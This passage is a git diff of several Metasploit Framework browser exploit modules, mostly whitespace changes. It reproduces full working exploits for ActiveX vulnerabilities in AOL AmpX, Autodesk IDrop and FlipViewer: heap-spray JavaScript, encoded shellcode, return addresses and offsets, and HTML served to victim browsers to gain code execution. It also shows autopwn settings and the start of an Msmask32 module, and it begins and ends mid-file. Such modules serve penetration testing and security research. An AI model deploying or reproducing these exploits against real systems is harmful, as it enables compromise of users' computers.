+				], self.class)
+	end
+
+	def php_exploit
+
+		timeout = 0.01
+		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
+		print_status("Trying uri #{uri}")
+
+		response = send_request_raw( {
+				'global' => true,
+				'uri' => uri,
+			},timeout)
+
+		if response and response.code != 200
+			print_error("Server returned non-200 status code (#{response.code})")
+		end
+		
+		handler
+	end
+
+end
diff --git a/modules/exploits/windows/browser/aol_ampx_convertfile.rb b/modules/exploits/windows/browser/aol_ampx_convertfile.rb
index b4512f6362..252686706b 100644
--- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb
+++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb
@@ -1,121 +1,121 @@
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
-
-	include Msf::Exploit::Remote::HttpServer::HTML
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow',
-			'Description'    => %q{
-				This module exploits a stack-based buffer overflow in AOL IWinAmpActiveX  
-				class (AmpX.dll) version 2.4.0.6 installed via AOL Radio website.
-				By setting an overly long value to 'ConvertFile()', an attacker can overrun 
-				a buffer and execute arbitrary code.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         => [ 
-						'rgod <rgod[at]autistici.org>',		# Original exploit [see References]
-						'Trancer <mtrancer[at]gmail.com>'	# Metasploit implementation
-						], 
-			'Version'        => '$Revision$',
-			'References'     => 
-				[
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack-based buffer overflow in AOL IWinAmpActiveX  
+				class (AmpX.dll) version 2.4.0.6 installed via AOL Radio website.
+				By setting an overly long value to 'ConvertFile()', an attacker can overrun 
+				a buffer and execute arbitrary code.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 
+						'rgod <rgod[at]autistici.org>',		# Original exploit [see References]
+						'Trancer <mtrancer[at]gmail.com>'	# Metasploit implementation
+						], 
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
 					[ 'OSVDB', '54706' ],
-					[ 'BID', '35028' ],
-					[ 'URL', 'http://www.milw0rm.com/exploits/8733' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Payload'        =>
-				{
-					'Space'         => 1024,
-					'BadChars'      => "\x00\x09\x0a\x0d'\\",	
-					'StackAdjustment' => -3500,
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 250, 'Ret' => 0x0C0C0C0C } ]	
-				],
-			'DisclosureDate' => 'May 19 2009',
-			'DefaultTarget'  => 0))
-	end
-
-	def autofilter
-		false
-	end
-
-	def check_dependencies
-		use_zlib
-	end
-
-	def on_request_uri(cli, request)
-		# Re-generate the payload
-		return if ((p = regenerate_payload(cli)) == nil)
-
-		# Encode the shellcode
-		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-
-		# Setup exploit buffers
-		nops 	  = Rex::Text.to_unescape([target.ret].pack('V'))
-		ret  	  = Rex::Text.uri_encode([target.ret].pack('L'))
-		blocksize = 0x40000
-		fillto    = 500 
-		offset 	  = target['Offset']
-	
-		# Randomize the javascript variable names
-		ampx	     = rand_text_alpha(rand(100) + 1)
- 		j_shellcode  = rand_text_alpha(rand(100) + 1)
-		j_nops       = rand_text_alpha(rand(100) + 1)
-		j_headersize = rand_text_alpha(rand(100) + 1)
-		j_slackspace = rand_text_alpha(rand(100) + 1)
-		j_fillblock  = rand_text_alpha(rand(100) + 1)
-		j_block      = rand_text_alpha(rand(100) + 1)
-		j_memory     = rand_text_alpha(rand(100) + 1)
-		j_counter    = rand_text_alpha(rand(30) + 2)
-		j_ret        = rand_text_alpha(rand(100) + 1)
-		j_eax        = rand_text_alpha(rand(100) + 1)
-		j_bof        = rand_text_alpha(rand(100) + 1)
-
-		# Build out the message
-		content = %Q|
-<html>
-<OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' id='#{ampx}'></OBJECT>
-<script language='javascript'>
-	#{j_shellcode}=unescape('#{shellcode}');
-	#{j_nops}=unescape('#{nops}');
-	#{j_headersize}=20;
-	#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
-	while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
-	#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
-	#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
-	while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
-	#{j_memory}=new Array();
-	for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};
-	#{j_eax}='';
-	for(#{j_counter}=0;#{j_counter}<=350;#{j_counter}++)#{j_eax}+=unescape('%FF%FF%FF%FF');
-	#{j_ret}='';
-	for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');
-	#{j_bof}=#{j_eax}+#{j_ret};
-	#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
-	#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
-	#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
-	#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
-</script>
-</html>
-			|
-
-		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
-
-		# Transmit the response to the client
-		send_response_html(cli, content)
-
-		# Handle the payload
-		handler(cli)
-	end
-
+					[ 'BID', '35028' ],
+					[ 'URL', 'http://www.milw0rm.com/exploits/8733' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'         => 1024,
+					'BadChars'      => "\x00\x09\x0a\x0d'\\",	
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 250, 'Ret' => 0x0C0C0C0C } ]	
+				],
+			'DisclosureDate' => 'May 19 2009',
+			'DefaultTarget'  => 0))
+	end
+
+	def autofilter
+		false
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def on_request_uri(cli, request)
+		# Re-generate the payload
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		# Encode the shellcode
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+
+		# Setup exploit buffers
+		nops 	  = Rex::Text.to_unescape([target.ret].pack('V'))
+		ret  	  = Rex::Text.uri_encode([target.ret].pack('L'))
+		blocksize = 0x40000
+		fillto    = 500 
+		offset 	  = target['Offset']
+	
+		# Randomize the javascript variable names
+		ampx	     = rand_text_alpha(rand(100) + 1)
+ 		j_shellcode  = rand_text_alpha(rand(100) + 1)
+		j_nops       = rand_text_alpha(rand(100) + 1)
+		j_headersize = rand_text_alpha(rand(100) + 1)
+		j_slackspace = rand_text_alpha(rand(100) + 1)
+		j_fillblock  = rand_text_alpha(rand(100) + 1)
+		j_block      = rand_text_alpha(rand(100) + 1)
+		j_memory     = rand_text_alpha(rand(100) + 1)
+		j_counter    = rand_text_alpha(rand(30) + 2)
+		j_ret        = rand_text_alpha(rand(100) + 1)
+		j_eax        = rand_text_alpha(rand(100) + 1)
+		j_bof        = rand_text_alpha(rand(100) + 1)
+
+		# Build out the message
+		content = %Q|
+<html>
+<OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' id='#{ampx}'></OBJECT>
+<script language='javascript'>
+	#{j_shellcode}=unescape('#{shellcode}');
+	#{j_nops}=unescape('#{nops}');
+	#{j_headersize}=20;
+	#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
+	while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
+	#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
+	#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
+	while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
+	#{j_memory}=new Array();
+	for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};
+	#{j_eax}='';
+	for(#{j_counter}=0;#{j_counter}<=350;#{j_counter}++)#{j_eax}+=unescape('%FF%FF%FF%FF');
+	#{j_ret}='';
+	for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');
+	#{j_bof}=#{j_eax}+#{j_ret};
+	#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
+	#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
+	#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
+	#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
+</script>
+</html>
+			|
+
+		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response_html(cli, content)
+
+		# Handle the payload
+		handler(cli)
+	end
+
 end
diff --git a/modules/exploits/windows/browser/autodesk_idrop.rb b/modules/exploits/windows/browser/autodesk_idrop.rb
index d97aceb284..18e84e406b 100644
--- a/modules/exploits/windows/browser/autodesk_idrop.rb
+++ b/modules/exploits/windows/browser/autodesk_idrop.rb
@@ -1,132 +1,132 @@
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
-
-	include Msf::Exploit::Remote::HttpServer::HTML
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Autodesk IDrop ActiveX Control Heap Memory Corruption',
-			'Description'    => %q{
-				This module exploits a heap-based memory corruption vulnerability in 
-				Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160.
-				An attacker can execute arbitrary code by triggering a heap use after 
-				free condition using the Src, Background, PackageXml properties.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         => [ 
-						'Elazar Broad <elazarb[at]earthlink.net>',	# Original exploit [see References]
-						'Trancer <mtrancer[at]gmail.com>'		# Metasploit implementation
-						], 
-			'Version'        => '$Revision$',
-			'References'     => 
-				[
-					[ 'OSVDB', '53265' ],
-					[ 'BID', '34352' ],
-					[ 'URL', 'http://www.milw0rm.com/exploits/8560' ],
-					[ 'URL', 'http://marc.info/?l=full-disclosure&m=123870112214736' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Payload'        =>
-				{
-					'Space'         => 1024,
-					'BadChars'      => "\x00\x09\x0a\x0d'\\",	
-					'StackAdjustment' => -3500,
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 900, 'Ret' => 0x0C0C0C0C } ]	
-				],
-			'DisclosureDate' => 'Apr 2 2009',
-			'DefaultTarget'  => 0))
-	end
-
-	def autofilter
-		false
-	end
-
-	def check_dependencies
-		use_zlib
-	end
-
-	def on_request_uri(cli, request)
-		# Re-generate the payload
-		return if ((p = regenerate_payload(cli)) == nil)
-
-		# Encode the shellcode
-		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-
-		# Setup exploit buffers
-		nops 	  = Rex::Text.to_unescape([target.ret].pack('V'))
-		blocksize = 0x40000
-		fillto    = 550 
-		offset 	  = target['Offset']
-	
-		# Randomize the javascript variable names
-		idrop	     = rand_text_alpha(rand(100) + 1)
-		j_function   = rand_text_alpha(rand(100) + 1)
- 		j_shellcode  = rand_text_alpha(rand(100) + 1)
-		j_nops       = rand_text_alpha(rand(100) + 1)
-		j_headersize = rand_text_alpha(rand(100) + 1)
-		j_slackspace = rand_text_alpha(rand(100) + 1)
-		j_fillblock  = rand_text_alpha(rand(100) + 1)
-		j_block      = rand_text_alpha(rand(100) + 1)
-		j_memory     = rand_text_alpha(rand(100) + 1)
-		j_counter    = rand_text_alpha(rand(30) + 2)
-		j_ret        = rand_text_alpha(rand(100) + 1)
-		j_mem        = rand_text_alpha(rand(100) + 1)
-
-		# Build out the message
-		content = %Q|
-<html>
-<head>
-<script language='javascript' defer>
-function #{j_function}() {
-	#{j_shellcode}=unescape('#{shellcode}');
-	#{j_nops}=unescape('#{nops}');
-	#{j_headersize}=20;
-	#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
-	while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
-	#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
-	#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
-	while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
-	#{j_memory}=new Array();
-	for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};
-
-	var #{j_ret} = '';
-	for (#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++) { 
-		#{j_ret} += unescape('%u0a0a');
-	}
-	for(#{j_counter}=0;#{j_counter}<20;#{j_counter}++) {
-		try {
-			var #{j_mem} = #{idrop}.Src;
-			#{idrop}.Src = 'http://' + #{j_ret};
-			#{idrop}.Src = #{j_mem};
-			#{idrop}.Src = 'http://' + #{j_ret};
-		} catch(e){}	
-	
-	}
-}
-</script>
-</head>
-<body onload='return #{j_function}();'>
-<object classid='clsid:21E0CB95-1198-4945-A3D2-4BF804295F78' id='#{idrop}'></object>
-</body>
-</html>
-			|
-
-		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
-
-		# Transmit the response to the client
-		send_response_html(cli, content)
-
-		# Handle the payload
-		handler(cli)
-	end
-
-end
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Autodesk IDrop ActiveX Control Heap Memory Corruption',
+			'Description'    => %q{
+				This module exploits a heap-based memory corruption vulnerability in 
+				Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160.
+				An attacker can execute arbitrary code by triggering a heap use after 
+				free condition using the Src, Background, PackageXml properties.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 
+						'Elazar Broad <elazarb[at]earthlink.net>',	# Original exploit [see References]
+						'Trancer <mtrancer[at]gmail.com>'		# Metasploit implementation
+						], 
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
+					[ 'OSVDB', '53265' ],
+					[ 'BID', '34352' ],
+					[ 'URL', 'http://www.milw0rm.com/exploits/8560' ],
+					[ 'URL', 'http://marc.info/?l=full-disclosure&m=123870112214736' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'         => 1024,
+					'BadChars'      => "\x00\x09\x0a\x0d'\\",	
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 900, 'Ret' => 0x0C0C0C0C } ]	
+				],
+			'DisclosureDate' => 'Apr 2 2009',
+			'DefaultTarget'  => 0))
+	end
+
+	def autofilter
+		false
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def on_request_uri(cli, request)
+		# Re-generate the payload
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		# Encode the shellcode
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+
+		# Setup exploit buffers
+		nops 	  = Rex::Text.to_unescape([target.ret].pack('V'))
+		blocksize = 0x40000
+		fillto    = 550 
+		offset 	  = target['Offset']
+	
+		# Randomize the javascript variable names
+		idrop	     = rand_text_alpha(rand(100) + 1)
+		j_function   = rand_text_alpha(rand(100) + 1)
+ 		j_shellcode  = rand_text_alpha(rand(100) + 1)
+		j_nops       = rand_text_alpha(rand(100) + 1)
+		j_headersize = rand_text_alpha(rand(100) + 1)
+		j_slackspace = rand_text_alpha(rand(100) + 1)
+		j_fillblock  = rand_text_alpha(rand(100) + 1)
+		j_block      = rand_text_alpha(rand(100) + 1)
+		j_memory     = rand_text_alpha(rand(100) + 1)
+		j_counter    = rand_text_alpha(rand(30) + 2)
+		j_ret        = rand_text_alpha(rand(100) + 1)
+		j_mem        = rand_text_alpha(rand(100) + 1)
+
+		# Build out the message
+		content = %Q|
+<html>
+<head>
+<script language='javascript' defer>
+function #{j_function}() {
+	#{j_shellcode}=unescape('#{shellcode}');
+	#{j_nops}=unescape('#{nops}');
+	#{j_headersize}=20;
+	#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
+	while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
+	#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
+	#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
+	while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
+	#{j_memory}=new Array();
+	for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};
+
+	var #{j_ret} = '';
+	for (#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++) { 
+		#{j_ret} += unescape('%u0a0a');
+	}
+	for(#{j_counter}=0;#{j_counter}<20;#{j_counter}++) {
+		try {
+			var #{j_mem} = #{idrop}.Src;
+			#{idrop}.Src = 'http://' + #{j_ret};
+			#{idrop}.Src = #{j_mem};
+			#{idrop}.Src = 'http://' + #{j_ret};
+		} catch(e){}	
+	
+	}
+}
+</script>
+</head>
+<body onload='return #{j_function}();'>
+<object classid='clsid:21E0CB95-1198-4945-A3D2-4BF804295F78' id='#{idrop}'></object>
+</body>
+</html>
+			|
+
+		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response_html(cli, content)
+
+		# Handle the payload
+		handler(cli)
+	end
+
+end
diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb
index 6c9ad8c6a9..fa186a3999 100644
--- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb
+++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb
@@ -1,115 +1,115 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
-
-	include Msf::Exploit::Remote::HttpServer::HTML
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'FlipViewer FViewerLoading ActiveX Control Buffer Overflow',
-			'Description'    => %q{
-				This module exploits a stack overflow in E-BOOK Systems FlipViewer 4.0. 
-				The vulnerability is caused due to a boundary error in the 
-				FViewerLoading (FlipViewerX.dll) ActiveX control when handling the
-				"LoadOpf()" method.
-			},
-			'License'        => BSD_LICENSE,
-			'Author'         => [ 'LSO <lso@hushmail.com>' ], 
-			'Version'        => '$Revision$',
-			'References'     => 
-				[
-					[ 'CVE', '2007-2919' ],
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'FlipViewer FViewerLoading ActiveX Control Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack overflow in E-BOOK Systems FlipViewer 4.0. 
+				The vulnerability is caused due to a boundary error in the 
+				FViewerLoading (FlipViewerX.dll) ActiveX control when handling the
+				"LoadOpf()" method.
+			},
+			'License'        => BSD_LICENSE,
+			'Author'         => [ 'LSO <lso@hushmail.com>' ], 
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
+					[ 'CVE', '2007-2919' ],
 					[ 'OSVDB', '37042' ],
-					[ 'BID', '24328' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Payload'        =>
-				{
-					'Space'         => 1024,
-					'BadChars'      => "\x00",
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					# Tested ok patrickw 20090303
-					[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ],
-				],
-			'DisclosureDate' => 'June 6 2007',
-			'DefaultTarget'  => 0))
-	end
-
-	def autofilter
-		false
-	end
-
-	def check_dependencies
-		use_zlib
-	end
-
-	def on_request_uri(cli, request)
-		return if ((p = regenerate_payload(cli)) == nil)
-
-		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-		
-		nops    = Rex::Text.to_unescape(make_nops(4))
-
-		ret     = Rex::Text.uri_encode([target.ret].pack('L'))
-
-                vname  = rand_text_alpha(rand(100) + 1)
-                var_i  = rand_text_alpha(rand(30)  + 2)
-                rand1  = rand_text_alpha(rand(100) + 1)
-                rand2  = rand_text_alpha(rand(100) + 1)
-                rand3  = rand_text_alpha(rand(100) + 1)
-                rand4  = rand_text_alpha(rand(100) + 1)
-                rand5  = rand_text_alpha(rand(100) + 1)
-                rand6  = rand_text_alpha(rand(100) + 1)
-                rand7  = rand_text_alpha(rand(100) + 1)
-                rand8  = rand_text_alpha(rand(100) + 1)
-	
-		content = %Q|
-			<html> 
-			<object classid='clsid:BA83FD38-CE14-4DA3-BEF5-96050D55F78A' id='#{vname}'></object>
-			<script language='javascript'>
-			var #{rand1} = unescape('#{shellcode}');
-			var #{rand2} = unescape('#{nops}');
-			var #{rand3} = 20;
-			var #{rand4} = #{rand3} + #{rand1}.length;
-			while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
-			var #{rand5} = #{rand2}.substring(0,#{rand4});
-			var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
-			while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
-			var #{rand7} = new Array();
-			for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
-			var #{rand8} = "";
-			for (#{var_i} = 0; #{var_i} < 1324; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
-			#{vname}.LoadOpf(#{vname}, #{vname}, #{vname}, #{vname}, #{vname}, #{vname}, #{vname}, #{rand8});  
-			</script>
-			</html>
-						|
-
-		content = Rex::Text.randomize_space(content)
-
-		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
-
-		send_response_html(cli, content)
-
-		handler(cli)
-	end
-
-end
-
+					[ 'BID', '24328' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'         => 1024,
+					'BadChars'      => "\x00",
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					# Tested ok patrickw 20090303
+					[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ],
+				],
+			'DisclosureDate' => 'June 6 2007',
+			'DefaultTarget'  => 0))
+	end
+
+	def autofilter
+		false
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def on_request_uri(cli, request)
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+		
+		nops    = Rex::Text.to_unescape(make_nops(4))
+
+		ret     = Rex::Text.uri_encode([target.ret].pack('L'))
+
+                vname  = rand_text_alpha(rand(100) + 1)
+                var_i  = rand_text_alpha(rand(30)  + 2)
+                rand1  = rand_text_alpha(rand(100) + 1)
+                rand2  = rand_text_alpha(rand(100) + 1)
+                rand3  = rand_text_alpha(rand(100) + 1)
+                rand4  = rand_text_alpha(rand(100) + 1)
+                rand5  = rand_text_alpha(rand(100) + 1)
+                rand6  = rand_text_alpha(rand(100) + 1)
+                rand7  = rand_text_alpha(rand(100) + 1)
+                rand8  = rand_text_alpha(rand(100) + 1)
+	
+		content = %Q|
+			<html> 
+			<object classid='clsid:BA83FD38-CE14-4DA3-BEF5-96050D55F78A' id='#{vname}'></object>
+			<script language='javascript'>
+			var #{rand1} = unescape('#{shellcode}');
+			var #{rand2} = unescape('#{nops}');
+			var #{rand3} = 20;
+			var #{rand4} = #{rand3} + #{rand1}.length;
+			while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
+			var #{rand5} = #{rand2}.substring(0,#{rand4});
+			var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
+			while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
+			var #{rand7} = new Array();
+			for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
+			var #{rand8} = "";
+			for (#{var_i} = 0; #{var_i} < 1324; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
+			#{vname}.LoadOpf(#{vname}, #{vname}, #{vname}, #{vname}, #{vname}, #{vname}, #{vname}, #{rand8});  
+			</script>
+			</html>
+						|
+
+		content = Rex::Text.randomize_space(content)
+
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+
+		send_response_html(cli, content)
+
+		handler(cli)
+	end
+
+end
+
diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb
index 4c60845426..ce51bc7ee8 100644
--- a/modules/exploits/windows/browser/ie_createobject.rb
+++ b/modules/exploits/windows/browser/ie_createobject.rb
@@ -22,6 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::BrowserAutopwn
 	autopwn_info({
 		:ua_name    => HttpClients::IE,
+		# In badly misconfigured situations, IE7 and 8 could be vulnerable to
+		# this, but by default they throw an ugly popup that stops all script
+		# execution until the user deals with it and aborts everything if they
+		# click "no".  Not worth the risk of being unable to try more recent
+		# exploits.
+		:ua_maxver  => "6.0",
 		:javascript => true, 
 		:os_name    => OperatingSystems::WINDOWS,
 		:vuln_test  => 'CreateObject',
@@ -41,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'{0006F033-0000-0000-C000-000000000046}',
 					'{0006F03A-0000-0000-C000-000000000046}',
 			],
-		:rank => ExcellentRanking  # reliable exe writer
+		#:rank => ExcellentRanking  # reliable exe writer
 	})
 
 	def initialize(info = {})
diff --git a/modules/exploits/windows/browser/ms_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms_visual_studio_msmask.rb
index de8dda1ec5..e34fede00c 100644
--- a/modules/exploits/windows/browser/ms_visual_studio_msmask.rb
+++ b/modules/exploits/windows/browser/ms_visual_studio_msmask.rb
@@ -1,122 +1,122 @@
-###
-## This file is part of the Metasploit Framework and may be subject to
-## redistribution and commercial restrictions. Please see the Metasploit
-## Framework web site for more information on licensing and terms of use.
-## http://metasploit.com/framework/
-###
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
+###
+## This file is part of the Metasploit Framework and may be subject to
+## redistribution and commercial restrictions. Please see the Metasploit
+## Framework web site for more information on licensing and terms of use.
+## http://metasploit.com/framework/
+###
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
-
-	include Msf::Exploit::Remote::HttpServer::HTML
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow.',
-			'Description'    => %q{
-					This module exploits a stack overflow in Microsoft's Visual Studio 6.0.
-					When passing a specially crafted string to the Mask parameter of the
-					Msmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary
-					code.
-				},
-			'License'        => MSF_LICENSE,
-			'Author'         => [ 'koshi', 'MC' ], 
-			'Version'        => '$Revision$',
-			'References'     => 
-				[
-				    	[ 'CVE', '2008-3704' ],
-					[ 'BID','30674' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Payload'        =>
-				{
-					'Space'         => 1024,
-					'BadChars'      => "\x00",
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'Windows XP SP0-SP2 IE 6.0 SP0-SP2', { 'Ret' => '' } ]	
-				],
-			'DisclosureDate' => 'Aug 13 2008',
-			'DefaultTarget'  => 0))
-
-			register_options(
-				[
-					OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
-				], self.class)
-	end
-
-	def autofilter
-		false
-	end
-
-	def check_dependencies
-		use_zlib
-	end
-
-	def on_request_uri(cli, request)
-		# Re-generate the payload.
